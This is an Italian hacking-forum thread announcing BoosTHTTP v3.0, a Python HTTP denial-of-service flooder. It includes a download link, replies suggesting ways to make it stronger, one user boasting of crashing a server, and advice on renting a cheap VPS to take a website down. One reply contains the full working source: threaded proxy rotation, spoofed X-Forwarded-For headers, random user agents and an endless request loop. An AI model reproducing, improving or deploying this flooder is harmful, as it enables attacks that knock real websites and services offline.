BoosTHTTPv3.0 Mega PowerFul FasT Pr0xy | SockeT

Stato
Discussione chiusa ad ulteriori risposte.

#TheRunixx

Utente Gold
26 Agosto 2012
799
33
155
323
Ultima modifica da un moderatore:
BoosTHTTP v3.0 by TheRunixx & Huggye

Ecco la nuova e preziossima versione del BoosTHTTPv3.0
sono state cambiate molte cose abbiamo aggiunto Header che caricano quando startano i Thread per evitare rallentamenti inutili
poi abbiamo messo una funzione per i proxy, cioè che potete scegliere voi la directory.
Questo HTTP Flooder è il flooder più potente e veloce di tutti quelli postati in questa sezione.

Se volete informazioni su come funziona lo script potete leggere la Source e ci saranno dei commenti.

Ora basta chiacchere è passiamo al Download: http://www.mediafire.com/download/8f17fjh038d57yf/BoosTHTTP+NewVersion+megapowerful.rar

video prova:

Spero che questa versione vi piaccia più delle altre ;).
Dovrete avere Python 2.7 per poterne usufruire, ne vale la pena ;).


P.S: AGGIORNATE LA LISTA PROXY.

 
Siete ridicoli... @B4ckdoor hai fatto un lavoro eccezionale con Backself, prestigio per il forum e prestigio per te! Hai il mio appoggio e quello di tutto lo staff! Non denigrare però il lavoro altrui in nessun modo! Mai! [MENTION=176637]TheRunixx[/MENTION] non è una gara! Non lo è! Siamo una community e lavoriamo l'uno per l'altro! Perchè non collaborate, non mettete insieme le vostre idee e create qualcosa che incarni i lati migliori di entrambe le soluzioni?

Basta flame, sono stufo. @V0K3 sii più severo per favore
 
Consiglio i creatori queste piccole cose che potrebbero rendere il programma un 'buon tool', almeno un tool utilizzabile:
  • Ottimizzate l'utilizzo di memoria
  • Fate un parsing delle opzioni da command-line piuttosto che un programma interattivo che chiede i dati all'utente in realtime, non ce ne è bisogno, inoltre se lo fate come ho detto io questo tools può essere utilizzato in altri programmi
  • Prima di avviare l'attacco controllare se i proxy sono disponibili, quelli non disponibili toglieteli dalla lista e chiedete al creatore se salvare le modifiche sul file
  • Evitate di scrivere in console lo start dei thread, le operazioni di I/O rallentano drasticamente il programma, se possibile (come in questo caso), vanno evitate (già che per ogni richiesta non lo scrivete su console (stile b4ckself è un grosso passo avanti))
  • Pensate di cambiare il linguaggio di programmazione, il Python non da alcuna possibilità di gestire la memoria, ed in un tool del genere questa cosa è veramente importante
  • Keep it free, beh che dire, una cosa per essere buona deve essere aperta :p

Avete ancora molto da fare e tanto da studiare, ma dei passi avanti ci sono.
Non ho altro da dire, buona fortuna ;)
 
Gli errori quali sono esattamente? Non è che lo esegui con python 3?

Esattamente, svista mia!
Posso dire la mia sul programma? Io sviluppo in C++ quindi non entrerò nel merito della sintassi... posso dare un parere da utente!

Innanzi tutto complimenti, è un programma che io ho scaricato e salvato nel mio sistema ;)

I miei test li eseguo tutti su server miei, tutti vulnerabili a questo genere di attacco così da poter paragonare programmi della medesima categoria in condizioni favorevoli!
In confronto a Backself io direi che questo tool è più potente, mentre con il primo riesco a mandare off il server per qualche minuto, con BoosT l'ho portato al crash!

difetti:

1 - non potete rilasciare insieme al programma una lista di proxy non raggiungibili, un utente non previdente rischia di utilizzarla!
2 - non c'è una buona gestione degli errori... quando sbaglio ad inserire un sito oppure la lista dei proxy il programma DEVE avvertirmi subito, immediatamente e dirmi dove ho sbagliato... non darmi la linea d'errore e lasciarmelo intuire.

Per il resto, +1 e like
 
Per il poco che posso dire sul sorgente, io direi che è buono, sintetico! La variabile thread io la riempirei ad 800 in automatico, a meno di direttive differenti... ora l'ho fatto io sul codice ma vi consiglierei di rilasciarla con questo ritocco
 
  • Mi piace
Reazioni: Huggye e TheRunixx
Rispetto alla versione bosthttp 2, in questa avete rivoluzionato l'intera struttura del DoS, molto più ben strutturato,
non sono più 10 righe di codice insomma... ma siete riusciti a non tralasciare velocità e potenza,
carina l'idea e molto chiara la spiegazione delle vare funzioni del DoS, mi ha fatto capire qualcosa in più, complimenti!
 
  • Mi piace
Reazioni: Huggye e TheRunixx
Consiglio i creatori queste piccole cose che potrebbero rendere il programma un 'buon tool', almeno un tool utilizzabile:
  • Ottimizzate l'utilizzo di memoria
  • Fate un parsing delle opzioni da command-line piuttosto che un programma interattivo che chiede i dati all'utente in realtime, non ce ne è bisogno, inoltre se lo fate come ho detto io questo tools può essere utilizzato in altri programmi
  • Prima di avviare l'attacco controllare se i proxy sono disponibili, quelli non disponibili toglieteli dalla lista e chiedete al creatore se salvare le modifiche sul file
  • Evitate di scrivere in console lo start dei thread, le operazioni di I/O rallentano drasticamente il programma, se possibile (come in questo caso), vanno evitate (già che per ogni richiesta non lo scrivete su console (stile b4ckself è un grosso passo avanti))
  • Pensate di cambiare il linguaggio di programmazione, il Python non da alcuna possibilità di gestire la memoria, ed in un tool del genere questa cosa è veramente importante
  • Keep it free, beh che dire, una cosa per essere buona deve essere aperta
    tongue.gif

Avete ancora molto da fare e tanto da studiare, ma dei passi avanti ci sono.
Non ho altro da dire, buona fortuna
icon_wink.gif

Intanto ti ringrazio per la tua critica molto costruttiva. Ti rispondo al fatto di cambiare linguaggio di programmazione, io ormai sto studiando il python da diversi mesi non so come potrei cambiare linguaggio di programmazione ormai finisco questo e poi più avanti forse cambierò linguaggio di programmazione e passerò al C o C# ;).

Esattamente, svista mia!
Posso dire la mia sul programma? Io sviluppo in C++ quindi non entrerò nel merito della sintassi... posso dare un parere da utente!

Innanzi tutto complimenti, è un programma che io ho scaricato e salvato nel mio sistema ;)

I miei test li eseguo tutti su server miei, tutti vulnerabili a questo genere di attacco così da poter paragonare programmi della medesima categoria in condizioni favorevoli!
In confronto a Backself io direi che questo tool è più potente, mentre con il primo riesco a mandare off il server per qualche minuto, con BoosT l'ho portato al crash!

difetti:

1 - non potete rilasciare insieme al programma una lista di proxy non raggiungibili, un utente non previdente rischia di utilizzarla!
2 - non c'è una buona gestione degli errori... quando sbaglio ad inserire un sito oppure la lista dei proxy il programma DEVE avvertirmi subito, immediatamente e dirmi dove ho sbagliato... non darmi la linea d'errore e lasciarmelo intuire.

Per il resto, +1 e like

Grazie mille!

Scusate la mia ignoranza ma è meglio del B4ckself V4.3 ?

Questo è più veloce quindi è più potente ^^.

Rispetto alla versione bosthttp 2, in questa avete rivoluzionato l'intera struttura del DoS, molto più ben strutturato,
non sono più 10 righe di codice insomma... ma siete riusciti a non tralasciare velocità e potenza,
carina l'idea e molto chiara la spiegazione delle vare funzioni del DoS, mi ha fatto capire qualcosa in più, complimenti!

Grazie, tutti i commenti sono stati fatti da @Huggye che si è spaccato in due per farli :p
 
  • Mi piace
Reazioni: Huggye e pacman94
Ultima modifica da un moderatore:
uno è finito in dev/null, il prossimo?
Se dico basta è basta.

E spero di non dovermi ripetere.
Litigare per 20 righe di codice scritte in python non mi pare il caso, manco stesse parlando di un kernel.

Cercate di fare meno i bambini lamerelli gentilmente.

- - - Updated - - -

Quali sono i vantaggi nel usarlo su ubuntu?
Non ci sono vantaggi, semplicemente non capisce quello che sta dicendo.
Puoi usare una qualunque distro linux.

Sono sinceramente stufo di vedere lamerelli qui dentro, non siamo cucurbitacee.tecnologia.virgilio.it quindi anzicchè dare consigli a pazzo di cane, (perchè è questo che fate) gentilmente pensate con la testa
 
Grazie! potresti dirmi altre caratteristiche della/e VPS che dovrei acquistare per poter mandare giù un sito?
e solo a scopo informativo.. mai avuto a che fare in questo campo.

Inoltre se acquisto 2Vps posso sempre attaccare 1 solo sito con quelle 2 vero? Se potresti mi diresti le caratteristiche fondamentali, oltre a Ubuntu come hai detto.

Vabene anche un vps su OVH da € 2,50 ;).
 
  • Mi piace
Reazioni: Eleonorade
Ultima modifica da un moderatore:
Beh 30 MB per un programma che fa solo richieste socks è parecchio, in ogni caso riguardo alla parte delle opzioni da commandline, non ha senso farlo così, se vuoi fare una cosa fatta per bene prendi un comando GNU e imitane il funzionamento (quindi se per esempio lo startano senza argomenti dici 'digita 'boosthttp --help' per i comandi', insomma hai capito..
sinceramente non vedo come si potrebbe usare meno memoria :( per il discorso degli argomenti ho capito, vedremo di farlo
 
  • Mi piace
Reazioni: TheRunixx
Veramente complimenti! Un packetstormer così potete non l'ho mai visto! E' assurdo!!! L'unica pecca è che quando parte l'attacco dice solo The attack is running... a mio parere si potrebbe mostrare una schermata con tutte le richieste che il programma sta inviando... se fai questo il programma è PERFETTO! ;)
 
  • Mi piace
Reazioni: TheRunixx
inutile a mio avviso
Si ma l'azione di acquisizione proxy non rallenta il programma perche sono 2 azioni separate... prima acquisisce i proxy e dopo che il programma importa proxy.txt l'attacco inizia... non ci sono rallentamenti... a meno che i proxy sono vecchi e fuori uso da tempo... questo è un altro discorso...
 
  • Mi piace
Reazioni: pacman94
Ultima modifica:
Comunque, per chi volesse farlo partire con python 3.x, con due modifiche lo si rende facilmente compatibile anche con python 3.x. Basta usare input al posto di raw_input e aggiungere le parentisi ai print e dovrebbe andare senza problemi. Non ho potuto testare il programma in toto perché non ho nessun hosting su cui provare però non dovrebbero esserci problemi. Per il resto, sembra essere fatto abbastanza bene.

Codice:
#!/usr/bin/env python
#coding: utf8 

import random
import socket
import threading
import time

userAgents = ["Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
              "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
              "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
              "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
              "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
              "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
              "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
              "Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0",
              "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101  Firefox/28.0",
              "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3",
              "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0",
              "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0",
              "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))",
              "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
              "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)",
              "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)",
              "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00",
              "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14",
              "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14",
              "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14",
              "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02",
              "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00",
              "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00",
              "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
              "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)",
              "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)",
              "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+",
              "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
              "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+",
              "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+",
              "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7",
              "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5",
              "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
              "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
              "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
              "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3",
              "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",]

def randomIp():
    random.seed()
    result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.'
    result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254))
    return result

def randomIpList():
    random.seed()
    res = ""
    for ip in xrange(random.randint(2, 8)):
        res = res + randomIp() + ", "
    return res[0:len(res) - 2]

def randomUserAgent():
    return random.choice(userAgents)



class attacco(threading.Thread):
    def run(self):
        # il thread si prende l'ID
        current = x
        
        # se l'ID è associabile ad un proxy, usa il proxy corrispondente
        if current < len(listaproxy):
            proxy = listaproxy[current].split(':')
        else:
            # altrimenti ne sceglie uno casuale
            proxy = random.choice(listaproxy).split(':')

        # composizione dell'header http
        useragent = "User-Agent: " + randomUserAgent() + "\r\n"
        forward = "X-Forwarded-For: " + randomIpList() + "\r\n"

        httprequest = get_host + useragent + accept + forward + connection + "\r\n"

        # questo ciclo fa aspettare che tutti i threads siano startati prima di cominciare
        while nload:
            time.sleep(1)
            
        # ciclo infinito dell'attacco
        while 1:
            # try perché non vogliamo che un errore ci fermi il thread
            try:
                # dichiarazione del socket
                a = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                
                # connessione al proxy
                a.connect((proxy[0], int(proxy[1])))
                
                # invio della richiesta http
                a.send(httprequest)
                
                # dopo aver inviato la prima richiesta http con successo
                # c'è la possibilità che se ne possano inviare altre
                # sulla stessa connessione grazie alla
                # connessione keep-alive. visto che non c'è la certezza
                # è meglio metterlo in un try tutto suo
                try:
                    # invia la richiesta al massimo per altre 3 volte
                    # si è visto che è una scelta abbastanza ottimizzata
                    for i in xrange(3):
                        a.send(httprequest) 
                except:
                    # variabile al momento inutile, tanto per fargli fare
                    # qualcosa dentro l'except, probabilmente in futuro servirà
                    tts = 1

                    
            except:
                # nel caso in cui durante la prima richiesta http avvenga un errore
                # c'è la possibilità che il proxy non funzioni correttamente
                # quindi si provvede a cambiare proxy
                proxy = random.choice(listaproxy).split(':')



# grafica varia
print("          .----.BoosTHTTPv3.0 iPerFul DDoS for HTTP WebSite.----.")
print("                 .----.Creator: TheRunixx & Huggye.----.")

# input del sito
url = input("Sito: ")
host_url = url.replace("http://", "").replace("https://", "").split('/')[0]

# qui viene caricata la lista proxy dal file proxy.txt
in_file = open(raw_input("Lista proxy: "),"r")
proxyf = in_file.read()
in_file.close()

# grazie al caro split() ora la lista è una lista :D
listaproxy = proxyf.split('\n')

# input del numero di threads
thread = input("Thread (800): ")


# dichiarazione di alcuni pezzi dell'header
get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n"
accept = "Accept-Encoding: gzip, deflate\r\n"

# con "Connection: Keep-Alive, ecc..." è possibile, anche se non dovrebbe esserlo, inviare
# ai proxy più richieste http usando la stessa connessione
connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n"


# nload (not loaded) è 1 quando i threads non sono ancora stati tutti avviati
# e diventa 0 quando il ciclo di avvio dei threads è finito
nload = 1

# x serve a dare "l'id" del thread
x = 0

# ciclo di avvio dei threads
for x in xrange(thread):
    attacco().start()
    time.sleep(0.003)
    print ("Thread " + str(x) + " started!")
    
print ("The attack is running...")
# nload diventa 0 e i thread iniziano a lavorare
nload = 0

#ciclo nabbo in fondo
while not nload:
    time.sleep(1)
 
  • Mi piace
Reazioni: TheRunixx
A mio parere non conta chi prende inspirazione da chi, l'importante è chi riesce a ottenere il risultato migliore...

Inviato dal mio GT-I9100 utilizzando Tapatalk
Che mi sono perso..?

Non esattamente, -.- (Tecnicamente B4ckself, scritto in py 3.3, è più veloce di sto coso)
 
  • Mi piace
Reazioni: B4ckdoor
Stato
Discussione chiusa ad ulteriori risposte.